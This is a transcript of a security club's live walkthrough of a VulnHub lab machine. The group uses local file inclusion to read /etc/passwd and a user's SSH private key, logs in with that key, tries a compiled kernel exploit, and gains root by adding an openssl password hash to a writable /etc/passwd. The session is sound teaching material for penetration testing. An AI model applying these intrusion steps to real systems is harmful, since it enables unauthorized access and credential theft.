That's right. Python 3-m http.server. And then whatever port, I'm going to do port 80, which means actually I'm going to have to put sudo in front of this. And now I have that web server going. So let me try over here. TCP:// oh, I got to know my own IP address.
15, I think.
You are correct. 10.0.2.15/test.html. That does not seem to have worked. Let me go check over here though. Did I get a hit? No. So it did not hit me on that one. So it doesn't seem, at least that way, that we have remote file inclusion. But we have local file inclusion, and that's really good. Is there anything else here? Let's go back. This is still working. Okay. So it's not finding anything else that we need right now. Let's see. Is that the right IP address?
Yeah, that's yours. It didn't work for me either. This is as far as I got.
Okay.
I tried reading the access log, var log Apache 2 access.log. That didn't work. Because I think to view the access logs in Apache, you have to be an admin on the newer versions of Apache. You can read the group file, you can read the passwd file.
Okay.
I was gonna start trying to read maybe some of William's files in home William, but I wasn't sure.
What if I do? Let me grab that. Replace that with. No, it doesn't work. What if I do ... I'm trying to get it to show me the PHP code.
Yeah, I was trying to do the same.
You can just take out the ... or the dot and then just do index.php, no?
I can. Okay. You
So
see how
just
this
do
is
like
going right now? I just
Yeah,
crashed the server.
That's what happened to me too.
So, because it was recursively calling the code, and each one was calling it again. That's okay. Let's go up one. That one was also called index.php, wasn't it? Let's go back to our scan. Scroll way up here. way, way, way up here. So this is, where's port 80? There we go. So this tells us the Apache HTTPD version, right? What we could do is Google, and they don't change too much between, but I could Google Apache 2.3 local file inclusion. And let's see what other people to do.
Why don't you try running a Samba enumeration since it has those ports open? Maybe we could find like a user or something.
Yeah, also there's FTP. Maybe one of those users has like a weak password, maybe.
That's a good point. That's a good point. Let me go back here and so let me go ahead and grab this. And hopefully they have mouse pad. Yeah. Ah, it didn't automatically.
I've got it formatted already if you want it.
No, I will do it the old-fashioned way. And I will, oh, you know what? This isn't going to work because there's going to be spaces in, well, maybe not. Let's try.
I think you might be able to copy mine from the chat.
I want to do this the hardest way possible, Jason. Let's try it. There we go.
There you go.
That's pretty close, but I'll just use Jason's since Jason has already done it for us. Copy. Let me go back to mousepad. Okay. So we got root daemon. So this is the user I'm probably doing stuff as right now.
I think it cut me off. I think it cut off some of it. Where did it go to?
It's a system D.
To system D.
Yeah, the one under time sync.
To system D under time sync. I don't even see that. Oh, there's, okay, so here's the rest. Oops.
So I am.
There's the rest of it. Just get rid of the system D.
Gotcha. All right, so system D network, system D resolved, message bus, SSH daemon, William, and FTP. So the first thing we're going to look at is who can log in. William can log in. What can I do with that information?
And try and steal SSH.
Brute force Williams login.
I could try to brute force Williams login. Or I could try to poke around in William's home directory.
Oh yeah.
So what I could do is, let me go ahead and I'm going to copy this because this has the correct number of ups. But I could do home/William. And actually, if their permissions were really bad, I could browse his home directory. I can't. But I could do .bash history. Can I see his history?
No, but you can see bash RC.
Okay.
Maybe-
Now your
maybe-
bash RC isn't going to usually show you anything particularly useful, but it does show me that that I'm in the right direct, that I can look in through his stuff.
Maybe look at his SSH keys.
We could try that. So that would be under dot. So if you're like, well, how do I know where all this stuff is? You know, you have a Linux machine right here. So if I do ls-a, you know, I can look, hey, what are things here that I might be interested in? Maybe there's something under cache, maybe there's something under Mozilla. Do I have .ssh here? I don't, because I've never SSH with this one. But if I do SSH local host, sudo systemctl.
So on mine, Professor, I have a .ssh directory, known hosts, known_hosts.
All right, let me try. Let me try. I'm trying to create it here so I can share it with everybody. All right, so now it created my. Let me go ahead and exit. I don't need to be in SSH right now. ls-8. If I what? You know what? This is annoying me. I do not like the future. I like the past. So I only have the known hosts right now because I have not set up a key yet. But I know there's RSA underscore what?
Keys. Or I don't remember really.
Let's see if I can find the known hosts.
That didn't work.
It did not work. So what is the RSA file, Vint?
On mine, I just have like user specific ones. Like I have like user X at this website. So it's not a standard file.
SSH directory files. So ID ID DSA or ID RSA. All right, let's try that.
Yeah, there you go. I think it's ID underscore RSA pub ID.
Oh, I got his
Thank
private key here, right? If I have his private key, I can log
You can
in.
log in. Yep.
I can log in as
SSH-I.
So now what I don't know is how HTML is going to, let's view source.
Well, was it ID underscore RSA?
Yes, this is, let me go to the end here, ID underscore RSA. And if I do ID underscore RSA dot pub,
That's his public key.
yeah.
But it's not there, but
So this is the end SSH private key. Let me copy that. And again, I'll go to mousepad and I'll do file new. File save as, and I'll put it in. I'm just going to call this. What do we just call it? Is it ID RSA?
ID underscore RSA.
And I'm going to leave it in my home directory. Let's try SSH-I for the to use a file / ID RSA, and we're going to RSA as William. That was his name, right? William.
Yeah. Yep.
So yes, I trust it. No. Oh, didn't work.
You can chmod 600 because it
Okay.
says permissions.
There we go.
Open.
So let me try it again. So chmod 600. What? Oh, tilde / Oh,
There you go.
I'm William. Woo! Good job, guys. Who am I? Who am I? Sudo-L. Hey, what is this? Is this Portuguese?
It's,
Is that Spanish?
yeah,
Yeah, it's Spanish.
Okay.
orden no encontrada.
Okay. So,
Command not found.
yeah, I think it is command F. So let's see. ID. So let's look at, so excellent work. This has been a long kind of slog. I appreciate you guys hanging out with me. So let me ask.
Professor, this is good because I struggle with pen tests like this too, because I wouldn't say that I give up too easily, but at some point I would have given up already.
Yeah, we get frustrated, and that's a normal part of the process. And you notice nothing here was anything. Nothing we've done so far is some of you might have a little bit less background and you might not have seen this stuff, but for most of you, you've seen everything we've done today, either in our club meetings or doing NCL. Nothing was super inventive, but it's just doing the work and going back, right? And what, I had to use dirbuster instead of dir, you know what I mean? It's the same thing, but I would have had to gone through it twice with another command to get a slightly different result. That's what it is. It's just going back over and over and over again and trying to find. Oh. So we got the user text. So let me ask you guys this. Do you guys want to try to get the root text, or you guys want to call it a day?
Root, yes. Yep.
Who wants to do root? Show of hands.
Yes.
I gotta go to the bathroom though.
Okay. Let's go ahead and take a 6-minute break. We'll meet back here at 2 o'clock. and then we'll go for root. Okay, guys? All right, back here at 2.
Good.
I'm going to pause the recording while we're doing this too. So yeah, Adam, it's just time on task. And that's one of the things that makes like root to boot harder than, like CTF style stuff, is because it combines everything together. Whereas CTF is kind of individual tasks, but it's, other than that, it's not really that different. And you just have to keep trying things, and the more you get exposed to it, the easier it is. So we, at this point, have what's called, we've owned a user. So if this was a hack the box, we could put this in, we get 10 points, right? We have not yet owned root because we are a regular user. Luckily, you guys have all been coming to the Linux privilege escalation, and we are on a Linux machine here. You've all been coming to the Linux privilege escalation meetings that we've been doing. So what could we do to elevate our privileges? What do we check first?
Sudo permissions.
What's that?
We check if we have sudo permissions or which files we could access without sudo.
Yeah, so sudo is kind of the easiest because so that's what I did. I did sudo-L for list, and it says command not found. So this might be one of the machines that predates sudo that they didn't use sudo on. I can try where is sudo, and it doesn't seem to find it. So this one doesn't seem to use sudo. I can do cat/etc/sudoers, and that file doesn't exist. So it doesn't seem like this box uses sudo, but that would be my first, that would be the place I would always start. I would always start with sudo. The next thing I would probably want to do, before anything else, is since I have a regular user account, what's here? There is a bash history. If I do ls-la, so we see that they specifically made, or the bash history has the right permissions that is not world readable. But I can read it because I am William. So let me do cat.bash history. And there's nothing in there but what I'm doing. There's nothing in there. But that would be the first place I would check to see if something was in there. I also have the GNU-PG, which might have keys I could use for things. Let's look at ls document. And generally, there's not going to be anything in the user folders, but we'll check. All right, which we already used that RSA key in order to log in. Let's check videos, nothing there. There probably isn't going to be anything in the profile. I can check. So I do have. Oh. Yeah, so there are no private keys in here that would be useful. I can check .local. Nothing in nano. Okay, but let's poke around. So what is the easiest method of privilege escalation? Anybody remember that?
Switch user.
I could try su root. But it wants a password. Now, the easiest method is some kind of kernel exploit. So I could do uname dash A. I can do cat slash etc slash star release star. So this is telling me this is Debian version 10. And this is, I think this is, so this is a 64-bit. And it is kernel 4.9. So what I can do, and I'm going to, let me go ahead and split. Let me do here. Let me do search exploit kernel 4. I suppose I should have specified Linux kernel. Yeah. Kernel Linux 4. Those are x86. Those won't work. We're 4.9, right? Or 4.19.
0.19.
So it seemed like, because there's a lot of them here. So obviously, all of these are these Linux kernel 2, right? Those won't work. This one might work. So, because these are a higher number than what we have. Let's try. Search exploit -m. And let me do vim 39. This is from 2015. I'm going to try this. I don't think it's going to be a kernel exploit just because that's not usually how they do this stuff. But I'm going to try it. GCC. No GCC. Quit. Oop. Let me do GCC -o a.out 39. It made it. Let me do I still have, yeah, I still have the web server going. Do I have wget up here? Okay, so wget http://10.0.2.15/a.out. And it's here, chmod plus execute a.out. Okay, so that didn't work. And like I said, kernel exploits, they usually patch those for CTFs just because they're finicky. So you might do everything right and it still doesn't work because of the nature of them. So what I really want to do is I want to get the Linux lse.sh up here, which means I have to get it on my machine. Oh, am I not connected? Am I connected to the internet? I did. I did a Google search. So let's do lse.sh. Oh. Linux Smart Enumeration. That's what I want. And let me go right to the file. Go to raw. Let's see if I can wget that. This one might not be allowed to go out, but I can. All right. Again, chmod plus x. And I'm going to run it with the default, which is the simplest one. It might end up being too big for my terminal, so if it does, then I'll run it again and redirect it to a file. Let me go ahead and make this a little bit bigger. Boom, bada boom, bada boom. Actually, you know what? I didn't just try looking in the root directory, which technically wouldn't be the same as getting root. Oh, and you know what? It's all because I didn't have it wide enough when it started. Everything's already down on the next line. Let's go through here. So who I am, I don't have a password. This is my path. That's the kernel that I'm using. I'm in groups. I'm not an administrative group. There are other users with shell. This is an important one, other users with shell, because sometimes I want to become a different user and from there become root. So that's actually a thing I should check out. Is there anybody else in the home directory? Are the path variables defined in etc? Yeah, okay. Nope. No sudo. Are there writable files outside the user's home? There are. Are there binaries with, oh, dum ba dum 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 dum. Wait a minute. etc password is the password file. Why would that have set UID? What? All right, so that's weird that that's like that. Well, let me.
I think they did it that way so that you can read the SC password from the web server, whatever the web server is running as.
Vince, we could do this like a Filipino. What do you guys see?
That you can write to it.
Boom. So this is what Lazaro brought up before. So Lazaro in the chat said we were able to read the password file before. Can we just add a new user to that? I should not be able to write to it, but I obviously can. So somebody hosed that whole thing up. So what I can do is
You can use OpenSSL to create a password.
I can. That's one way I could do it. I'm going to do it. What? No, Vim? What country is this? I'm going to do it a different way. So let's see. No permission for root. So this is so right now I just made William user ID 0. So he should have root permissions on stuff. And actually, let me go back. I should probably change both. And I will comment that out. So there is no root. And I'm gonna change my group ID to 0 to root as well. Now the problem is, see, I do ID. ID still thinks I'm user ID 1000, but that person doesn't exist. So I think the most correct way would be to log out and log back in. All right. Yeah, because I don't know. Let's see if I can do su root. Now it's asking for a password.
All right, SU William.
Let me exit. Let me log in again. What? Oh, you're killing me.
Snapshots, man, snapshots.
I should have done a snapshot. So I just killed myself from going back in. And you know what it probably is because it's trying to log me in as root, they probably have a root password required. So root can't SSH in. Well, okay. All right. So what do I do? What's the solution?
Start all over.
I got to start all over. Now, I don't have to start all over because what I need to do is, let me go ahead and minimize that.
Well, you have the notes, so you can just.
Yeah. So all I need to do is, there we set it. I saved the file and I didn't do a snapshot. So let me go, I'm just going to shut it down. Power
Probably
off.
have to download again if you are running off the original.
Yeah, so I'm just going to delete it and then yeah, create a new one.
You can't log in with the RSA anymore?
No, because it probably has in the SSHD config, it probably won't let, it either won't let root SSH in or it won't let root SSH in without giving a password, which is a common thing. Can I delete all files? But that's okay because we have the original file, so I can just import it again. And then, so I'm going to import it again, and then I can SSH into it as William, and I can still read and write from that file. I'll have to re-upload LSE if we need to keep messing with that. But let's go ahead and let's take a snapshot. Although it wouldn't have saved me that much time. Oh, no, I needed to change the
USB and the network.
it was only the network. The USB one was failing for the Kali.
Kali.
But I do need to change this to NAT network. Okay. All right, so it's starting now, it's running. Now we'll go back to my Kali machine. And now,
It's probably not up quite yet.
yeah. Give it a second.
And it may or may not have the same IP address.
Oh, that's a good point. Let me check that down here.
That's .5.
There's 5. There we go. Yes. All right. So I am William again. And we know that ls-l/etc/pass-wd. Okay. So we know that I can edit that file.
So why was there a password dash file before?
That's typically like a auto backup.
Oh, okay.
All right, so let's try this again. All right. So now it still says I'm a D1000.
You don't have a name to use at Gemini. That's what it says.
The thing going, okay, that makes sense. Because it's still trying to do things with maybe I won't be able to do it that. That's okay. We'll do it the other way. So I was trying to be lazy about it. We'll go back to that. So what I can do is I can, probably the easiest thing to do is set the root password, which is what we talked about before. Unfortunately, my notes are on my other VM, which is closed right now. So let's look up.
You posted your notes to Slack, remember?
I did. So where did I put that?
I think that's it right there.
There we go. Where is?
I don't know if it was in there or not, but
Yeah, it's right here. Weak file permissions. Can I read etc shadow? Can I write append etc password? Open SSL password. That's what I want to do.
yeah.
So here on this one, we'll do open SSL password, and we'll just make it capital P at SSW0RD. And we get this. Copy that. And we will go up here.
You got to get rid of the X.
I don't know if it's really there or not because I hit the back arrow. So sometimes it doesn't. Yeah, it is there. Okay. So now su root, capital P at SSWRD. There we go. Now I'm root. @root/root.txt. Boom, bada boom, bada boom.
And the crowd goes wild.
Okay. So let me go ahead and we're done. We got it. Good job, everybody. But let's talk a little bit more about, if you guys are interested.
Professor, I have a question. So the Etsy password and the Etsy shadow, so you can just put the password in the password file instead of like modifying the shadow file?
Yes. So it's slightly different, and that's in these notes here. If you can write to the shadow file, then you use make password to make the password, because that's how everything works nowadays. If it goes into the password file, it is it MD5? I can't remember what particular passwords, what scheme they use. But it's like, it's not salted or anything. And to put it in the password file, you do this. The nice thing is it checks the password file before it checks the shadow file, right? So if you could write to the password file, you know, then it doesn't matter what's in the shadow file. Does that make sense?
Yes, yeah, thank you.
So let's run lsc.sh again. But now everything is running as root, so we'll have more. Oh, you know what? That's right. We can kill this. I don't want to run this as root. Because I don't know if this is one where there's only one way to do it, or if there are many ways to do it. So let's scroll up here. So there's our user, or there's our system. It's still doing that. Or did I go all the way up there? I did. There we go. That's as root. Yeah, as root. All right. So as William, this is our. Let me go ahead and exit this. So it's checking, are we part of different groups? If we're not part of groups, it might be because like we're a system account that's really isolated. That's why it tells you that. Are we part of like an admin group? We are not. Is there anybody else who has a shell that is, can we move to anybody else? And then from there, move to root? Yes. Our path variables defined inside /etc. Sometimes those are editable. No sudo stuff because this system doesn't use sudo. Can we write to files outside of our home at all? Yes. Are there binaries with the SUID bit set? Yes. What's SUID?
It's a bit that's set so that when you run the file, it runs with different permissions.
Yes. So it runs as the owner of the file, not as you. For example, you know, if I want to, if I have permission to start a service, only root can really start a service. So the file is owned by root. I have permission to run it, but it has to run as root. So are there ones with set UID that I can abuse? And it's saying there are some that have it. Are there any uncommon ones? You know, uncommon ones would be like things that people had written themselves. Because if they wrote it themselves, I might be able to find more ways to abuse it than the standard ones get updated. But if you wrote it yourself and there's a problem, you know, you'll never update it. Same thing with groups, like the root group. Can I read the root directory? No. Are there SSH files in the home directory? Yes. We already know that because we, you know, got access already. Because it was there and it had bad permissions. Nothing else useful in the home directories, nothing in FS tab. Can we write to critical files? Yes, we can write to etc password. So that right there is our way to escalate our privileges. Nothing, no directories we can write to, like no, you know, can you write to like user bin and maybe replace a binary? Nothing like that. Does the etc password file have hashes? It does because we put one there. But but this would be relatively easy to crack because we put in a weak password. Nothing else here. Is SE Linux there? No, so we don't need to worry about any of that. Cron tab, are there cron jobs? Yes, we didn't get that far. We didn't have to look at cron jobs, but that would be another place we can look. Can we write to any paths present in cron jobs? Yes, we can. We'll check that in a second. Nothing with the network that we can abuse. Nothing really with the services. There are Apache modules. So we might be able to, now Apache's not running as a higher level thing, but you know, we could play around with that. Can we write to the GPG agent socket? Right, that might be useful. We're not in a Docker container. We can retrieve process binaries. We can retrieve process users. There are processes running with root permissions. So if there are processes running with root permissions, then potentially I might be able to jump my code into memory if I can get them to load my file. But really, except for that, so it looks like this one, they really intended for us to write to the password file. That seems like their intention. The only other thing that looks promising here was cron jobs.
Cron job.
Let's take a look at that. Oh, so it's running stuff. Yeah. This is the shell it uses. This is the path it uses. But it's not really, you know, all it's doing right now is calling the hourly, daily, whatever. So what we can do is ls-l/etc cron.d. So we can't write anything to the cron.d. Actually, let me do, can I write to any of them? Wait, no, I want to do ls-la. So I cannot write to cron.d. I cannot write to cron daily. I cannot write to cron hourly. I cannot write to cron monthly. Yeah, so it doesn't look like cron would be a good avenue of attack either. So really, based on what we've seen, the only way to escalate privileges would be to find a vulnerable, you know, a kernel vulnerability, or what we just did, which is manipulate the password file. One last thing I want to show you guys. So if this was the case, right? If we were to, you know, if we had exhausted all of our possibilities and we couldn't find anything else, the next step is
What does LSE stand for? Linux?
Linux Smart Enumeration.
All right.
It says that the colors.
It was pretty slick.
Where is though? Shell check disable. Where does it say? I don't even see where it says it here. But I know that I can do LSE 2. Oh. So if I set it to 2, it's going to go into more depth, and then 3 is into more depth from there. So you know all those things where it says skip, right? The higher than, I think it's 1, 2, and 3 are the three levels of depth. You're going to get more and more information at each level. If I don't find anything there, then I just have to kind of manually start looking for things. If I'm manually looking for things, what would I be looking for? I'm going to kill this.
Files with the set UID bit set.
Well, this should find all of those. I could use a find command. I could run my own find command, but this really should find set UID because that's standard. But I might want to look under the temp drive, right?
Look for backups or something.
Backups, right? So I could start poking around in var, see everything that I can read. Can I, I might start grepping for just password and, everywhere I can.
Could you look in var log? Well, when you're done with that. There's a shadow back right there.
Yeah, I probably do not have permission. But let's check. Yeah, see, only root has permission for those backups, which is pretty standard. So that should be found by, what do you call it? By LSE. It should find that because this is a standard folder. And so if any of those were readable, it should tell me. You wanted to look at log?
Yeah, I was looking var log Apache 2, CD space Apache 2.
Okay. So you can see right there, I do not have, as William, I do not have read permission for that directory.
Oh, okay.
Only root and
And
admin can read that.
Okay, that's why I couldn't read it.
Yeah.
I was trying to read it from the website because you can get command execution if you can poison that log.
It's a good idea. Yeah, good idea. Okay.
This is great, Professor. Thank you.
All right, guys. Hopefully this is helpful for you. I'll post this in the next day or so. I will see you all next Saturday. By which time, again, I thought that the gymnasium was going to be open. It won't be, but it'll be open the Saturday after that. So next Saturday, Adam had a CTF that he was looking at. So maybe we'll poke around some of that, or maybe we'll do another vulnhub, root to boot. We'll see what people want. Okay.
There's a Tenable CTF coming up. I think
What
the
day?
middle of this month. I think it's the 15th.
Nope. Post it in the Slack. We'll take a look at it.
All right.
All right, guys. See you later.
See you, Professor. Bye, everyone.
Bye-bye.
Yeah.